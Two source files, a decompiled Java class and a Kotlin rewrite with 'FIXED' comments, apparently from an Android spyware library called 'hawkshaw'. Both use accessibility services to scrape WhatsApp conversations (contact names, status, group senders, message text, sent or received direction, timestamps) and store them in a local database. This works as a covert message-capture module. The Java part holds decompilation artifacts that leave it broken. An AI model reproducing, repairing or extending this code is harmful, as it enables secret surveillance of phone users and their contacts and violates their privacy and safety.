File: Dummy/hawkshaw/library/features/accessibility/socialmedia/Whatsapp.java
package com.hawkshaw.library.features.accessibility.socialmedia;

import M1.d;
import Y1.K;
import android.graphics.Rect;
import android.view.accessibility.AccessibilityNodeInfo;
import com.hawkshaw.library.datalayer.models.PackageName;
import com.hawkshaw.library.datalayer.room.AppDatabaseKt;
import com.hawkshaw.library.datalayer.room.socialmedia.SocialMediaEntity;
import com.hawkshaw.library.features.accessibility.AccessibilityUtilsKt;
import com.hawkshaw.library.ktextensions.NumbersKt;
import java.text.SimpleDateFormat;
import java.time.DayOfWeek;
import java.time.format.DateTimeFormatter;
import java.util.Calendar;
import java.util.Date;
import java.util.Locale;
import java.util.concurrent.ExecutorService;
import java.util.regex.Pattern;
import me.pushy.sdk.lib.jackson.core.util.MinimalPrettyPrinter;
import r3.j;

public final class Whatsapp {
    public static final Whatsapp INSTANCE = new Whatsapp();

    /* renamed from: p  reason: collision with root package name */
    private static final String f4969p = "com.whatsapp:id";

    private Whatsapp() {
    }

    private final Long extractGlobalTimestamp(String str) {
        Pattern compile = Pattern.compile("[A-Za-z]{2}[A-Za-z]+ (0?[1-9]|[12][0-9]|3[01]), \\d{4}$");
        K.m(compile, "compile(...)");
        Pattern compile2 = Pattern.compile("Today");
        K.m(compile2, "compile(...)");
        Pattern compile3 = Pattern.compile("Yesterday");
        K.m(compile3, "compile(...)");
        Pattern compile4 = Pattern.compile("[A-Za-z]{3}[A-Za-z]+");
        K.m(compile4, "compile(...)");
        Calendar instance = Calendar.getInstance();
        instance.set(11, 0);
        instance.set(12, 0);
        instance.set(13, 0);
        instance.set(14, 0);
        if (str == null || j.U(str)) {
            return null;
        }
        K.n(str, "input");
        if (compile.matcher(str).matches()) {
            Date parse = new SimpleDateFormat("MMMM dd, yyyy", Locale.getDefault()).parse(str);
            if (parse != null) {
                return Long.valueOf(parse.getTime());
            }
            return null;
        } else if (compile2.matcher(str).matches()) {
            return Long.valueOf(instance.getTimeInMillis());
        } else {
            if (compile3.matcher(str).matches()) {
                instance.set(5, instance.get(5) - 1);
                return Long.valueOf(instance.getTimeInMillis());
            } else if (!compile4.matcher(str).matches()) {
                return null;
            } else {
                int value = instance.get(7) - ((DayOfWeek.from(DateTimeFormatter.ofPattern("EEEE").parse(str)).getValue() % 7) + 1);
                if (value <= 0) {
                    value += 7;
                }
                instance.set(6, instance.get(6) - value);
                return Long.valueOf(instance.getTimeInMillis());
            }
        }
    }

    /* access modifiers changed from: private */
    public static final void extractMessages$lambda$3(SocialMediaEntity socialMediaEntity) {
        K.n(socialMediaEntity, "$entity");
        AppDatabaseKt.getDb().socialMediaDao().insertSync(socialMediaEntity);
    }

    public final void extractMessages(AccessibilityNodeInfo accessibilityNodeInfo, ExecutorService executorService) {
        CharSequence text;
        String obj;
        CharSequence text2;
        CharSequence text3;
        AccessibilityNodeInfo accessibilityNodeInfo2 = accessibilityNodeInfo;
        ExecutorService executorService2 = executorService;
        K.n(accessibilityNodeInfo2, "node");
        K.n(executorService2, "executor");
        AccessibilityNodeInfo findFirst = AccessibilityUtilsKt.findFirst(accessibilityNodeInfo2, "com.whatsapp:id/conversation_contact_name");
        CharSequence text4 = findFirst != null ? findFirst.getText() : null;
        if (text4 != null) {
            AccessibilityNodeInfo findFirst2 = AccessibilityUtilsKt.findFirst(accessibilityNodeInfo2, "com.whatsapp:id/conversation_contact_status");
            CharSequence text5 = findFirst2 != null ? findFirst2.getText() : null;
            AccessibilityNodeInfo findFirst3 = AccessibilityUtilsKt.findFirst(accessibilityNodeInfo2, "android:id/list");
            if (findFirst3 != null) {
                int childCount = findFirst3.getChildCount();
                Long l5 = null;
                String str = null;
                for (int i5 = 0; i5 < childCount; i5++) {
                    AccessibilityNodeInfo child = findFirst3.getChild(i5);
                    if (child != null) {
                        AccessibilityNodeInfo findFirst4 = AccessibilityUtilsKt.findFirst(child, "com.whatsapp:id/name_in_group_tv");
                        if (!(findFirst4 == null || (text3 = findFirst4.getText()) == null)) {
                            str = text3.toString();
                        }
                        AccessibilityNodeInfo findFirst5 = AccessibilityUtilsKt.findFirst(child, "com.whatsapp:id/conversation_row_date_divider");
                        if (!(findFirst5 == null || (text2 = findFirst5.getText()) == null)) {
                            l5 = INSTANCE.extractGlobalTimestamp(text2.toString());
                            Researcher researcher = Researcher.INSTANCE;
                            researcher.print("GT - " + text2 + ", " + l5);
                        }
                        AccessibilityNodeInfo findFirst6 = AccessibilityUtilsKt.findFirst(child, "com.whatsapp:id/message_text");
                        CharSequence text6 = findFirst6 != null ? findFirst6.getText() : null;
                        if (text6 != null) {
                            Rect rect = new Rect();
                            findFirst6.getBoundsInScreen(rect);
                            SocialMediaEntity.Type type = NumbersKt.getDp(rect.left) < 65 ? SocialMediaEntity.Type.Received : SocialMediaEntity.Type.Sent;
                            AccessibilityNodeInfo findFirst7 = AccessibilityUtilsKt.findFirst(child, "com.whatsapp:id/date");
                            String d02 = (findFirst7 == null || (text = findFirst7.getText()) == null || (obj = text.toString()) == null) ? null : j.d0(obj, " ", MinimalPrettyPrinter.DEFAULT_ROOT_VALUE_SEPARATOR);
                            SocialMediaEntity socialMediaEntity = r10;
                            SocialMediaEntity socialMediaEntity2 = new SocialMediaEntity(String.valueOf(text4), text5 != null ? text5.toString() : null, str, text6.toString(), type, Instagram.INSTANCE.extractTimestamp(d02, l5), PackageName.WHATSAPP, String.valueOf(d02));
                            executorService2.execute(new d(socialMediaEntity, 2));
                        }
                    }
                }
            }
        }
    }
}

File: app/src/main/java/com/hawkshaw/library/features/accessibility/socialmedia/Whatsapp.kt
package com.hawkshaw.library.features.accessibility.socialmedia

import android.graphics.Rect
import android.os.Build
import android.view.accessibility.AccessibilityNodeInfo
import androidx.annotation.RequiresApi
import com.hawkshaw.library.datalayer.models.PackageName
import com.hawkshaw.library.datalayer.room.AppDatabaseKt
import com.hawkshaw.library.datalayer.room.socialmedia.SocialMediaEntity
import com.hawkshaw.library.features.accessibility.AccessibilityUtilsKt.findFirst // Import the extension function
import com.hawkshaw.library.ktextensions.getDp
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.launch
import java.text.SimpleDateFormat
import java.time.DayOfWeek
import java.time.format.DateTimeFormatter
import java.util.Calendar
import java.util.Locale
import java.util.concurrent.ExecutorService
import java.util.regex.Pattern

/**
 * Object responsible for extracting WhatsApp messages from accessibility events
 */
object Whatsapp {
    private const val WHATSAPP_ID = "com.whatsapp:id"
    private val coroutineScope = CoroutineScope(Dispatchers.IO)

    /**
     * Extracts and processes WhatsApp messages from the provided accessibility node
     *
     * @param node The accessibility node containing WhatsApp message information
     * @param executor The executor service for handling background tasks (Note: executor is not directly used here, coroutineScope is)
     */
    @RequiresApi(Build.VERSION_CODES.O)
    fun extractMessages(node: AccessibilityNodeInfo, executor: ExecutorService) { // ExecutorService parameter is unused in this method currently.
        // FIXED: Call findFirst as an extension function on 'node'
        val contactNameNode = node.findFirst("$WHATSAPP_ID/conversation_contact_name")
        val contactName = contactNameNode?.text ?: return

        // FIXED: Call findFirst as an extension function on 'node'
        val statusNode = node.findFirst("$WHATSAPP_ID/conversation_contact_status")
        val status = statusNode?.text?.toString()

        // FIXED: Call findFirst as an extension function on 'node'
        val listNode = node.findFirst("android:id/list") ?: return
        val childCount = listNode.childCount

        var globalTimestamp: Long = System.currentTimeMillis()
        var sender: String? = null

        for (i in 0 until childCount) {
            val child = listNode.getChild(i) ?: continue

            // Check for group sender name
            // FIXED: Call findFirst as an extension function on 'child'
            val nameInGroupNode = child.findFirst("$WHATSAPP_ID/name_in_group_tv")
            nameInGroupNode?.text?.toString()?.let { s -> // Changed 'it' to 's' for clarity, though 'it' would also work
                sender = s
            }

            // Check for date divider (global timestamp)
            // FIXED: Call findFirst as an extension function on 'child'
            val dateDividerNode = child.findFirst("$WHATSAPP_ID/conversation_row_date_divider")
            dateDividerNode?.text?.toString()?.let { dateText ->
                extractGlobalTimestamp(dateText)?.let {
                    globalTimestamp = it
                }
            }

            // Check for message text
            // FIXED: Call findFirst as an extension function on 'child'
            val messageTextNode = child.findFirst("$WHATSAPP_ID/message_text")
            val messageText = messageTextNode?.text ?: continue

            // Determine message type based on position
            val rect = Rect()
            messageTextNode.getBoundsInScreen(rect)
            val messageType = if (getDp(rect.left) < 65) {
                SocialMediaEntity.Type.Received
            } else {
                SocialMediaEntity.Type.Sent
            }

            // Extract timestamp from date node
            // FIXED: Call findFirst as an extension function on 'child'
            val dateNode = child.findFirst("$WHATSAPP_ID/date")
            // Removed redundant replace, assuming the original intent was space normalization if needed.
            // If any specific character replacement is needed, it should be explicitly defined.
            val dateText = dateNode?.text?.toString()

            // Create a unique identifier for this message
            val identifier = "$contactName-$messageText-$dateText-${PackageName.WHATSAPP}"

            // Create and save entity
            val entity = SocialMediaEntity(
                type = messageType,
                packageName = PackageName.WHATSAPP.name,
                sender = sender,
                message = messageText.toString(),
                // FIXED: Ensure Instagram.extractTimestamp is called with non-null dateText
                timestamp = Instagram.extractTimestamp(dateText, globalTimestamp) ?: globalTimestamp
            )

            coroutineScope.launch {
                AppDatabaseKt.db.socialMediaDao().insert(entity)
            }
        }
    }

    /**
     * Extracts global timestamp from various date formats in WhatsApp
     *
     * @param input The string containing date information (e.g., "Today", "Yesterday", "Monday", "December 25, 2023").
     * @return The extracted timestamp in milliseconds, or null if no valid format found.
     */
    @RequiresApi(Build.VERSION_CODES.O)
    private fun extractGlobalTimestamp(input: String?): Long? {
        if (input.isNullOrEmpty()) {
            return null
        }

        val fullDatePattern = Pattern.compile("[A-Za-z]+ (0?[1-9]|[12][0-9]|3[01]), \\d{4}$") // Example: "December 25, 2023"
        val todayPattern = Pattern.compile("Today")
        val yesterdayPattern = Pattern.compile("Yesterday")
        val weekdayPattern = Pattern.compile("[A-Za-z]{3,}") // Matches full weekday names or abbreviations

        val calendar = Calendar.getInstance().apply {
            set(Calendar.HOUR_OF_DAY, 0)
            set(Calendar.MINUTE, 0)
            set(Calendar.SECOND, 0)
            set(Calendar.MILLISECOND, 0)
        }

        return when {
            fullDatePattern.matcher(input).matches() -> {
                val dateFormat = SimpleDateFormat("MMMM dd, yyyy", Locale.getDefault())
                dateFormat.parse(input)?.time
            }

            todayPattern.matcher(input).matches() -> {
                calendar.timeInMillis
            }

            yesterdayPattern.matcher(input).matches() -> {
                calendar.add(Calendar.DAY_OF_MONTH, -1)
                calendar.timeInMillis
            }

            weekdayPattern.matcher(input).matches() -> {
                // This block aims to parse a weekday string (e.g., "Monday", "Mon")
                // and calculate the timestamp for that day in the current week or previous week.
                try {
                    // Parse the input string to a DayOfWeek enum
                    val dayInPattern = DayOfWeek.from(
                        DateTimeFormatter.ofPattern("EEEE", Locale.getDefault()).parse(input)
                    ).value // ISO day of week (1-7, Monday=1)

                    var currentDayOfWeek = calendar.get(Calendar.DAY_OF_WEEK) // Calendar.DAY_OF_WEEK (1-7, Sunday=1)

                    // Convert ISO day of week to Calendar.DAY_OF_WEEK format
                    val dayInPatternCalFormat = (dayInPattern % 7) + 1 // Convert Monday=1 to Monday=2, Sunday=7 to Sunday=1 (after mod 7 it becomes 0, then +1)

                    var diff = currentDayOfWeek - dayInPatternCalFormat

                    if (diff < 0) { // If the target day is later in the current week, it means it was in the *previous* week
                        diff += 7
                    }
                    // 'diff' now represents how many days ago the target weekday was.
                    calendar.add(Calendar.DAY_OF_YEAR, -diff)
                    calendar.timeInMillis
                } catch (e: Exception) {
                    // Log error if date parsing fails for weekday
                    // Logger.e("Whatsapp", "Error parsing weekday: $input", e, false, 12, null)
                    null
                }
            }

            else -> null
        }
    }
}
